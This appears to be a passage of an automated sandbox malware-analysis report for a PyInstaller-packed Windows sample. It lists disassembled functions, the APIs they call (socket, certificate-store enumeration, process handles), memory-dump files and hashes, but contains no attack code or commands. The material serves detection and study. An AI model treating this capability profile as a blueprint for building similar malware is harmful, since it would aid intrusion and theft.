                                                                                                                                                                                                                              Function 00007FF8E8137370 Relevance: 9.1, APIs: 6, Instructions: 60networkCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Socketclosesocket$CurrentDuplicateHandleInformationProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 174288908-0
                                                                                                                                                                                                                              • Opcode ID: e73c3e338b1d3a0163c9cb3dc333ceb7c9fc365eae773b70ffb101dc398ab952
                                                                                                                                                                                                                              • Instruction ID: fea1a7b5399a9b337f2129743e0eb2d25d3df6d05b8b8a06ba288240542d7c45
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e73c3e338b1d3a0163c9cb3dc333ceb7c9fc365eae773b70ffb101dc398ab952
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7215020B0CB4282FA645BA1A8183BD2290AF89BF4F061735DD2E067D4DF3CE044C606
                                                                                                                                                                                                                              Function 00007FF7EAD1B2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF7EAD14F11,?,?,?,?,00007FF7EAD1A48A,?,?,?,?,00007FF7EAD1718F), ref: 00007FF7EAD1B2D7
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7EAD14F11,?,?,?,?,00007FF7EAD1A48A,?,?,?,?,00007FF7EAD1718F), ref: 00007FF7EAD1B30D
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7EAD14F11,?,?,?,?,00007FF7EAD1A48A,?,?,?,?,00007FF7EAD1718F), ref: 00007FF7EAD1B33A
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7EAD14F11,?,?,?,?,00007FF7EAD1A48A,?,?,?,?,00007FF7EAD1718F), ref: 00007FF7EAD1B34B
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7EAD14F11,?,?,?,?,00007FF7EAD1A48A,?,?,?,?,00007FF7EAD1718F), ref: 00007FF7EAD1B35C
                                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,00007FF7EAD14F11,?,?,?,?,00007FF7EAD1A48A,?,?,?,?,00007FF7EAD1718F), ref: 00007FF7EAD1B377
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                              • Opcode ID: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
                                                                                                                                                                                                                              • Instruction ID: 10b2ff77d91ebd9834225588a6c44b9d8dad45fda4d32e8db72292485a5836d3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01114930E0D64282FA58F331964137DD386DF687B0F8446B6E92E476DEDE3CA8518322
                                                                                                                                                                                                                              Function 00007FF7EAD02910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7EAD01B6A), ref: 00007FF7EAD0295E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                              • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                              • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                              • Instruction ID: ae51f5d1fe83f2c971d4e73fef52d4a43429731f2b0db052b25811b2ee4d1c3f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C31CF22B1968152F720E765A8803E6A395FF887D8F800133FE8D8374DEE7CD14AC621
                                                                                                                                                                                                                              Function 00007FF7EAD02390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                              • String ID: Unhandled exception in script
                                                                                                                                                                                                                              • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                              • Opcode ID: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                              • Instruction ID: 7d026c2daf2c81c5c0280fff79927e456b28180bb2e537748e3cb749f588f78a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28316372A19A8189FB20EB21E8553F9A364FF88788F840176EA4D47B5DDF3CD105C721
                                                                                                                                                                                                                              Function 00007FF8E8137884 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: et:gethostbyaddr$idna$socket.gethostbyaddr$unsupported address family
                                                                                                                                                                                                                              • API String ID: 0-1751716127
                                                                                                                                                                                                                              • Opcode ID: 5086264f726791613e909880d31947cc31a9419187b2cdc6173c49615d767bb6
                                                                                                                                                                                                                              • Instruction ID: c94e844e57524290fd104842182c2d369d37aa6f4fdddf50dc90d9913178daba
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5086264f726791613e909880d31947cc31a9419187b2cdc6173c49615d767bb6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0316161A18B8681EA209BA5F8447FE6364FF89BD4F460132DE8E43754DF3CE449C749
                                                                                                                                                                                                                              Function 00007FF7EAD02B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7EAD0918F,?,00007FF7EAD03C55), ref: 00007FF7EAD02BA0
                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF7EAD02C2A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentMessageProcess
                                                                                                                                                                                                                              • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                              • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                              • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                              • Instruction ID: da505b91eaedee4c8d100829ab9c4c40a91cdb1d33957f570433fb2b5490e2bc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1721A172708B4142F711EB64F8847EAA3A5FB88784F800136EA8D57659DE3CE245C751
                                                                                                                                                                                                                              Function 00007FF7EAD02710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7EAD01B99), ref: 00007FF7EAD02760
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                              • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                              • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                              • Instruction ID: b3653a7480c60acb36a9dd249aad42a1c08dedfdf0c78cfb7d5841418f6292e5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2217C72A19B8182F720EB60B8817E6A7A4EB88784F800176FA8D4365DDF7CD1498651
                                                                                                                                                                                                                              Function 00007FF8E8137F00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44networkCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: getservbynamehtons
                                                                                                                                                                                                                              • String ID: service/proto not found$socket.getservbyname$s|s:getservbyname
                                                                                                                                                                                                                              • API String ID: 3889749166-1257235949
                                                                                                                                                                                                                              • Opcode ID: 81776a8363e7915c76650aa2291702c83d97d5dac441e15644519e5976245378
                                                                                                                                                                                                                              • Instruction ID: 84abe6599e505b7d285148540287b41f9e0ffb6758c4298b0fc681afb8418461
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81776a8363e7915c76650aa2291702c83d97d5dac441e15644519e5976245378
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3111F61A1CB4782EA40DBA1E98437D6375FF8ABC5F550032DA8E43A64DF3CD445C746
                                                                                                                                                                                                                              Function 00007FF7EAD19A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                              • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                              • Instruction ID: 0d68a3035b4517ca4c50f72d4311e48bb8cd06f2c2e59faff72b6f0653c3bdd8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3F0C231B0970681FB10EB20E48437AA320EF55760F940276C66E461ECDF7CE148C331
                                                                                                                                                                                                                              Function 00007FF8E80FA874 Relevance: 7.7, APIs: 5, Instructions: 200encryptionCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1495132572.00007FF8E80F1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FF8E80F0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494989941.00007FF8E80F0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E80FE000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E8111000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E811A000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E811E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495565226.00007FF8E8121000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495640960.00007FF8E8123000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e80f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Cert$Store$00007CertificateCertificatesCloseContextE707EnumErrorFreeLastOpen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 888773134-0
                                                                                                                                                                                                                              • Opcode ID: 7eb488ba5e32441d0f01a54a1631f0afa1a8ca53c20eef8b2eeae5f161c725b6
                                                                                                                                                                                                                              • Instruction ID: ee67071971a77a5e676ef8de701560801d078df7fc4c2309684a926776d50447
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7eb488ba5e32441d0f01a54a1631f0afa1a8ca53c20eef8b2eeae5f161c725b6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67813C35A4DA4285FE55AFA5AA1433D22A5BF48BD8F4CC430DD0E067D1DF3DA45AC30A
                                                                                                                                                                                                                              Function 00007FF8E80FAC0C Relevance: 7.7, APIs: 5, Instructions: 161encryptionCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1495132572.00007FF8E80F1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FF8E80F0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494989941.00007FF8E80F0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E80FE000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E8111000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E811A000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E811E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495565226.00007FF8E8121000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495640960.00007FF8E8123000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e80f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Cert$Store$00007CloseContextE707EnumErrorFreeLastOpen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2569391109-0
                                                                                                                                                                                                                              • Opcode ID: e918e1c0eddfe07976633dd5ae524c922d6a439c169cdbef9b1a398d1dea870d
                                                                                                                                                                                                                              • Instruction ID: aa9d8041458669c99523e430c5c1926af2619afaf7e834a6144ed040e04a1720
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e918e1c0eddfe07976633dd5ae524c922d6a439c169cdbef9b1a398d1dea870d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1510C32E8DA5286FE595FA1991433D22A5AF89BDAF5CC430CD0E4A7D4DF3CA441C70A
                                                                                                                                                                                                                              Function 00007FF8E81381A8 Relevance: 7.6, APIs: 5, Instructions: 106COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeTable$ConvertInterfaceLuidNameTable2
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1671601251-0
                                                                                                                                                                                                                              • Opcode ID: 04bc949163b978593711b8e016bbaabdb93266c53af34e1d09aed761846783f8
                                                                                                                                                                                                                              • Instruction ID: 2fdc2815cd17ffee97ca74025f7b1213bbd34f6dbcc83861b59f261669211276
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04bc949163b978593711b8e016bbaabdb93266c53af34e1d09aed761846783f8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55413D36E0CA4282EB649BA1E85437D73A0FF89BC5F460035C94E62794DF3CE449CB4A
                                                                                                                                                                                                                              Function 00007FF8E80FCCDC Relevance: 7.6, APIs: 5, Instructions: 64encryptionCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1495132572.00007FF8E80F1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FF8E80F0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494989941.00007FF8E80F0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E80FE000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E8111000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E811A000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E811E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495565226.00007FF8E8121000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495640960.00007FF8E8123000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e80f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CertStore$CloseOpen$Collection
                                                                                                                                                                                                                              • String ID:
